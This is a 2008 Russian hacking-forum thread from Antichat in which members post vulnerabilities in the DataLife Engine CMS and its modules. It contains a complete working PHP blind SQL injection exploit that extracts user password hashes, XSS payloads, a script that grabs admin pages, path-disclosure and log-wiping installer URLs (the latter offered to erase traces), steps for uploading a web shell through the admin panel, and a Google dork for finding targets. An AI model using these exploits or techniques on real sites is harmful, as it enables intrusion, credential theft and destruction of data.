Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
08.04.2008, 23:17
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Активная, но очень неудобная XSS в модуле DLE mChat v. 2.0:
При отправке сообщения, вида:
Код:
<a href="http://www.ya.ru">А исправь ка</a>
В админке теги отфильтрованы не будут, и вместо стандартной администраторской функции редактирования сообщения, админ перейдёт по ссылке. Если очень постараться, можно создать фейковую страницу с просьбой ввести пароль для редактирования, и хитрым образом заставить админа попробовать отредактировать сообщение. (Из области научной фантастики)
З.Ы.
<script>, document.cookie - фильтрует, "javascript :" превращает в javascript :<b></b> и иногда в неудачных местах ставит <br />. В общем окне просмотра чата, теги видны прекрасно.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
12.04.2008, 02:05
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Раскрытие пути в DataLife Engine v.6.7:
Код:
http://site/engine/inc/init.php
http://site/engine/inc/preview.php
http://site/engine/data/dbconfig.php (работает не везде)
http://site/upgrade/error.php
http://site/upgrade/finish.php
http://site/upgrade/template.php
Раскрытие пути в модуле DLE Forum 2.1:
Код:
http://site/dle-forum.php
Раскрытие пути в модуле DLE mChat v. 2.0:
Код:
http://site/engine/ajax/mchat.refresh.php
Одна особенность! Не работает в IE, т.к. IE вместо отображения пытается принять файл, юзайте файрфокс или тулзы отображающие результат в текстовом виде.
Нашёл после того, как написал тулзу для поиска раскрытий пути и простейших SQL ошибок 
З.Ы.
Если кому надо - обращайтесь (написал на Java).
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
Последний раз редактировалось Qwazar; 12.04.2008 в 02:32..
|
|
|
|
12.04.2008, 04:41
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Вот ещё нашёл в модуле DLE Forum 2.1:
Уничтожить некоторые таблицы форума и узнать префикс к таблицам в БД, можно так:
Удалил т.к. то, что побочно уничтожается БД, заметил после публикации уязвимости, думаю неэтично такое выкладывать в паблик..
Уязвимость присутствует, если забыли удалить файл dle-forum.php. В дикой природе встречается ~ в 20-30% случаев.
Безопасно посмотреть префикс к таблицам БД можно так:
Код:
http://site/dle-forum.php?action=upgrade
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
Последний раз редактировалось Qwazar; 12.04.2008 в 05:17..
|
|
|
|
12.04.2008, 05:39
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
То же самое и в модуле DLE mChat v. 2.0, есть возможность удалить все записи в чате (в том числе логи чата), если забыли удалить папку /mcinstall/ после установки.
В принципе, для чата это не так деструктивно, а вот уничтожить следы деятельности поможет, так что выкладываю:
Код:
http://site/mcinstall/?action=doinstall
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
Последний раз редактировалось Qwazar; 12.04.2008 в 05:46..
|
|
|
|
DataLife Engine 6.7 vulnerability or higher |
21.04.2008, 00:34
|
|
Moderator - Level 7
Регистрация: 24.02.2006
Сообщений: 447
Провел на форуме:
2872049
Репутация:
705
|
|
DataLife Engine 6.7 vulnerability or higher
1. Бага заключается в следующем.
Смотрим сорс страницы пользователя
PHP код:
<script language="javascript" type="text/javascript">
<!--
var dle_root = '/';
var dle_skin = 'wf_0_1';
var dle_wysiwyg = 'no';
var menu_short = 'Быстрое редактирование';
var menu_full = 'Полное редактирование';
var menu_profile = 'Просмотр профиля';
var menu_fcomments = 'Найти все комментарии';
var menu_send = 'Отправить сообщение';
var menu_uedit = 'Админцентр';
var dle_req_field = 'Заполните все необходимые поля';
var dle_del_agree = 'Вы действительно хотите удалить этот комментарий?';
//-->
</script>
Теперь смотрим сорсы страницы админа
PHP код:
<script language="javascript" type="text/javascript">
<!--
var dle_root = '/cms/dle/';
var dle_admin = 'admin.php';
var dle_login_hash = '1bc5a8a12d90e476dbf6d1bcd58b5860';
var dle_skin = '123';
var dle_wysiwyg = 'no';
var menu_short = 'Быстрое редактирование';
var menu_full = 'Полное редактирование';
var menu_profile = 'Просмотр профиля';
var menu_fnews = 'Найти все публикации';
var menu_fcomments = 'Найти все комментарии';
var menu_send = 'Отправить сообщение';
var menu_uedit = 'Админцентр';
var dle_req_field = 'Заполните все необходимые поля';
var dle_del_agree = 'Вы действительно хотите удалить? Данное действие невозможно будет отменить';
var dle_del_news = 'Удалить новость';
var allow_dle_delete_news = true;
//-->
</script>
Собственно это нам и нужно
Код HTML:
var dle_admin = 'admin.php'; // скрипт адмиского входа.
var dle_login_hash = '1bc5a8a12d90e476dbf6d1bcd58b5860'; хеш пароля md5
Логин админа можно узнать из новостей публикуемых на сайте, но могут публиковать и привелигерованные пользователи, по другому хз.
Накатали скрипт, респект zarin за помощь, который подгружает страницу с серва и сохраняет ее на хосте. Нужно только одно условие чтобы оно сработало, это чтобы админ был залогинен на сайте.
PHP код:
<?php
if(isset($_POST["frame"])) {
$fh = fopen("gibson.txt","w+");
fwrite($fh,$_POST["frame"]);
fclose($fh);
}
else{
?>
<html>
<head>
<script>
function sendFrame(FrameID,FormID,TextareaID)
{
content = document.getElementById(FrameID).contentDocument.text;
document.getElementById(TextareaID).value = content;
document.getElementById(FormID).submit();
}
</script>
</head>
<body>
<div style="display:block;">
<form action="gibson.php" method="post" id="form0">
<textarea name="frame" id="text0" style="display:none;" ></textarea>
<input type="submit" name="ok" value="ok" style="display:none;" >
</form>
</div>
<IFRAME src="http://xxx.xx/index.php" onload="sendFrame('frame0','form0','text0')" id="frame0" WIDTH="0" HEIGHT="0" >
</IFRAME>
</body>
</html>
<?}?>
ps Скрипт работает в опере с локальными адресами! В фф сек эрроры)
2. Ну и так для развлечения ксс
PHP код:
http://xxx.xx/engine/modules/imagepreview.php?image=javascript:alert(document.cookie);
Нужно только чтобы рисунки были включены. |
|
|
|
05.05.2008, 08:11
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028
Репутация:
2371
|
|
DLE 6.3
Раскрытие пути:
Код:
index.php?catalog[]=
|
|
|
|
DataLifeEngine Online Mod Exploit Blind SQL Injection |
05.05.2008, 19:50
|
|
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631
Репутация:
380
|
|
DataLifeEngine Online Mod Exploit Blind SQL Injection
DLE Online Mod Exploit Blind SQL Injection
Нашел багу я, а эксплойт написал Евгений Минаев
Сохраняем эксплойт и закидываем его к себе на локалхост, от туда запускаем.
Выдерает хеши любого юзера, шифрация md5(md5($pass))
PHP код:
<?php
/* vim: set expandtab tabstop=4 shiftwidth=4 softtabstop=4: */
/**
* DataLifeEngine Online Mod Exploit Blind SQL Injection. Found by Maxster
* Need magic_quotes_gpc off and mysql version higher than 4.0 (on server)
*
* Useful: email, password, name
*
* PHP versions 4 and 5
*
* LICENSE: This source file is subject to version 3.0 of the PHP license
* that is available through the world-wide-web at the following URI:
* http://www.php.net/license/3_0.txt. If you did not receive a copy of
* the PHP License and are unable to obtain it through the web, please
* send a note to license@php.net so we can mail you a copy immediately.
*
* @category Exploit
* @package None
* @author Eugene Minaev <underwater@itdefence.ru>
* @copyright 2008 ITDefence.ru
* @license http://www.php.net/license/3_0.txt PHP License 3.0
* @version CVS: $Id:$
* @link http://underwater.itdefence.ru
* @since File available since Release 0x00
*/
@set_time_limit(0);
@ini_set('output_buffer', 0);
?>
<html>
<head>
<title>DataLifeEngine Online Mod Exploit Blind SQL Injection</title>
<style type="text/css">
body{
font-family: Tahoma;
font-size: 12px;
color: #e1e1e1;
background-color: #222;
}
</style>
</head>
<body>
<center>
<form method="post" action="<?php echo $_SERVER['SCRIPT_NAME']?>">
dle path:<input type="text" name="server" value="http://localhost/dle/" />
<br/><br/>
admin id: <input type="text" name="userid" value="1" />
<br/><br/>
<input type="submit" />
</form>
</center>
</body>
</html>
<?php
if (!empty($_POST))
{
$_ = create_function('$error', 'die("$error");');
$userid = isset($_POST['userid']) ? (int) $_POST['userid'] : null;
$server = isset($_POST['server']) ? $_POST['server'] : null;
$alphabet = array('a', 'b', 'c', 'd', 'e', 'f', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0');
$responce = null;
$password = null;
$curpos = 1;
$alppos = 0;
$flag = false;
$pathinfo = parse_url($server);
if (false === is_array($pathinfo) or empty($pathinfo['host'])) {
$_('invalid url');
} else {
$fsocket = fsockopen($pathinfo['host'], 80) or
$_('hostname is dead');
$request = "GET {$pathinfo['path']} HTTP/1.1\r\n"
. "Host: {$pathinfo['host']}\r\n"
. "Cookie: dle_onl_session='underWHAT?!\r\n\r\n";
fwrite($fsocket, $request) or
$_ ('failed to write data to socket');
while ($flag === false){
$responce .= fread($fsocket, 128);
$flag = strpos($responce, '</html>') ? true: false;
}
$flag = false;
if (strpos($responce, 'MySQL Error') > 0){
while (strlen($password) < 32)
{
$fsocket = fsockopen($pathinfo['host'], 80) or
$_('hostname is dead');
$responce = null;
$cookie = "' or 1=if(substring((select password from dle_users where user_id = $userid),$curpos,1)='{$alphabet[$alppos]}',1,(select 1 union select 3))/*";
$request = "GET {$pathinfo['path']} HTTP/1.1\r\n"
. "Host: {$pathinfo['host']}\r\n"
. "Connection: close\r\n"
. "Cookie: dle_onl_session=$cookie\r\n\r\n";
fwrite($fsocket, $request) or
$_ ('failed to write data to socket');
$responce = fread($fsocket, 8000);
if (!strpos($responce, 'returns more than 1 row')){
$password .= $alphabet[$alppos];
$curpos += 1;
$alppos = 0;
} else {
$alppos += 1;
}
$flag = false;
$responce = null;
fclose($fsocket);
}
} else {
die ('<center><h1>not vulnerable</h1></center>');
}
echo "<center><h1>$password</h1></center>";
}
}
?>
Google dork: "20ка посетивших:"
|
|
|
|
21.05.2008, 03:08
|
|
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935
Репутация:
1202
|
|
Datalife Engine 6.7 XSRF
Datalife Engine 6.7 XSRF
_http://securityvulns.ru/Tdocument552.html
Exploit:
http://site.com/datalife-path/engine/modules/imagepreview.php?image=[XSRF]
Подробно рассмотрено: _https://forum.antichat.ru/thread67881.html
Последний раз редактировалось Elekt; 13.06.2008 в 08:39..
Причина: Причина: ок, спасибо, дополнил. Если вы знаете баг, не описанный в теме - запостите его
|
|
|
|
11.06.2008, 23:31
|
|
Reservists Of Antichat - Level 6
Регистрация: 04.02.2007
Сообщений: 1,152
Провел на форуме:
3008839
Репутация:
1502
|
|
Заливка шелла через админку Datalife Engine
Версию точно определить не смог, но в сорцах написано про 2008 год.
Итак, заходим в админцентр.
Далее нажимаем "Другие разделы"
Выбираем где-то в конце "Архив файлов"
Идём на "Настройка Архива Файлов"
Допустимые форматы файлов: дописываем php.
Сохраняемся, идём в "Добавить файл".
Заливаем шелл
Его дальше видно в разделе "Файловый Архив" для всех и в свойствах загруженного файла в редактировании файлов в админке.
Нашёл сегодня сам, так как очень приспичело, а старые баги не подходили. Если уже где-то было, извините..
Потом, может, сниму видео...
__________________
Bedankt euch dafür bei euch selbst.
H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ
|
|
|
|
23.06.2008, 11:35
|
|
Участник форума
Регистрация: 04.05.2005
Сообщений: 109
Провел на форуме:
304075
Репутация:
31
|
|
Сообщение от [=IZERLI=]
КАК ЗАЛИТЬ !!!
+ С меня в репу )
Попробуй через редактирование шаблона сайта.
Там можно вставлять php код в текущий шаблон ИЛИ есть кнопочка [создать новый]. Через нее можно тупо создать шелл. А потом в своих настройках отображения сайта выбрать вновь созданную тему.
Вообщем как-то так. Экспериментируйте.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
